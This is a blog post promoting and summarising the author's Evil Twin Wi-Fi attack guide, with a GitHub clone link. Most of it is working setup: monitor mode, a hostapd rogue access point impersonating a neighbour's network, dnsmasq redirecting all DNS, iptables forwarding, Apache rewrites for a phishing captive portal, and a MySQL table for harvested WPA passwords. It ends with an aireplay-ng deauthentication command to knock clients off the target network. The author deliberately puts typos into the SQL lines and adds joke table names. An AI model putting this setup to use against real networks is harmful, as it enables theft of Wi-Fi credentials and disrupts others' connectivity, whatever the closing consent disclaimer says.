Yesterday on sudorealm I posted a guide for the Evil Twin attack!
Guide Contents
Like:
Simple Reconnaissance.
Setting up your own Access Point with hostapd.
Distribute ips on connected hosts with dnsmasq.
Provide connected users with internet with iptables.
Write your own Rewrite rules on the Apache2 configurations.
Setup a cool captive portal, with modern Front-End techniques
Bootstrap
jQuery
Client-Side Form validation with Parsley.js Library
Store credentials to local MySQL Database
You are more than welcome to comment on your thoughts, any ideas whatsoever that you have for the project, and more.
You can clone the project and start playing around immediately.
git clone https://github.com/athanstan/EvilTwin_AP_CaptivePortal.git
Feel free to contribute whatever the hell you want! This is why open source exists! π€
Also since you are here! This is my Spotify playlist that I listen to whenever I am coding and hacking! So enjoy ππ§πΆ
Commands for attack setup
Install dnsmasq
apt-get install dnsmasq -y
Install hostapd
apt-get install hostapd
Put Wireless adapter on monitor mode
airmon-ng start wlan0
Setup dnsmasq.conf
touch dnsmasq.conf
And paste inside the following lines:
#Set the wifi interface
interface=wlan0mon
#Set the IP range that can be given to clients
dhcp-range=10.0.0.10,10.0.0.100,255.255.255.0,8h
#Set the gateway IP address
dhcp-option=3,10.0.0.1
#Set DNS server address
dhcp-option=6,10.0.0.1
#Set Server
server=8.8.8.8
#logs
log-queries
log-dhcp
#Redirect all requests to 10.0.0.1
address=/#/10.0.0.1
Setup hostpad.conf
After you have found your target AP with airodump-ng wlan0mon
Type touch hostapd.conf
to create the file and paste inside the following lines:
interface=wlan0mon
driver=nl80211
ssid=neighborAP
hw_mode=g
channel=8
macaddr_acl=0
ignore_broadcast_ssid=0
Setup iptables rules
First, create the file with touch iptablesRules.sh
and then paste the following lines inside:
iptables --flush
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface wlan0mon -j ACCEPT
iptables -t nat -A POSTROUTING -j MASQUERADE
echo 1 > /proc/sys/net/ipv4/ip_forward
Now type chmod +x iptablesRules.sh
to be able to run it with ./iptablesRules.sh
Setup Apache2 Rewrite Rules
You need to add some code on the apache2 configuration file that you can find in kali at /etc/apache2/sites-enabled/000-default.conf
once you have found it you can use gedit to open it, and paste the following chunk of code under the </VirtualHost>
tag:
<Directory "/var/www/html">
RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_HOST} ^www\.(.*)$ [NC]
RewriteRule ^(.*)$ http://%1/$1 [R=301,L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*)$ / [L,QSA]
</Directory>
And then run a2enmod rewrite
Setup the code for the Captive Portal
Copy the contents of the Captive Portal you want to appear inside /var/www/html
and then start the server with service apache2 start
Setup MySQL Database
For your connection with the Captive Portal you need a Database with the following settings:
Start MySQL Service
β Be careful, Simple Copy-Pasting is dangerous! So I intentionally added some typos in my MySQL Syntax. π Let's play find the Bug π
service mysql start
Then mysql -u root -p
to enter as root and create a new user, for password just press enter
, but first.
Create the Database
MariaDB [(none)]>cretae database eviltwin;
Query OK, 1 row affected (0.000 sec)
MariaDB [(none)]> use eviltwin;
Database changed
Create a new user and grant him all privileges for the DB
MariaDB [(none)]>cretae user dodgers@localhost identfied by 'duck';
Query OK, 0 rows affected (0.000 sec)
MariaDB [(none)]> grant all priviledges on eviltwin.* to 'dodgers'@ 'localhost';
Query OK, 0 rows affected (0.000 sec)
Create the table
MariaDB [eviltwin]>cretae table wpa_keys(password1 varhcar(32), password2 varhcar(32));
Query OK, 0 rows affected (0.015 sec)
MariaDB [eviltwin]> show tables;
+--------------------------+
| Hidden_NSA_Exploits |
+--------------------------+
| s3cretsSn0wdendoesntKnow |
+--------------------------+
| wpa_keys |
+--------------------------+
Done. You can now interact with the Captive portal with no problems! If you have followed everything correctly that is. π€
Deployment Phase
Allocate IP and Subnet mask
ifconfig wlan0mon up 10.0.0.1 netmask 255.255.255.0
Add Routing table
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
Forward Traffic
./iptablesRules.sh
Turn on the Fake Access Point
hostapd hostapd.conf
Enable dnsmasq
dnsmasq -C dnsmasq.conf -d
Bonus Section
After you have successfully connected your second wireless adapter, put it on monitor mode and then type:
aireplay-ng -0 0 -a 00:1D:1C:FD:64:AB wlan1mon
To deauthenticate your target AP and leave him unauthenticated until he falls for your trap! πππ
The End, Have fun play around become better, and don't hack without consent. This is serious guys, you could get into Jail.
Learn to Hack, then Hack to learn more!
D3ad_R1nger out. π¨
About Comments
if you don't like commenting, here are some alternatives for us to chat:
π€ https://www.reddit.com/user/stantz16
π₯https://twitter.com/DevThanos
π€΅ https://www.linkedin.com/in/athanasios-stantzouris-34ba44141/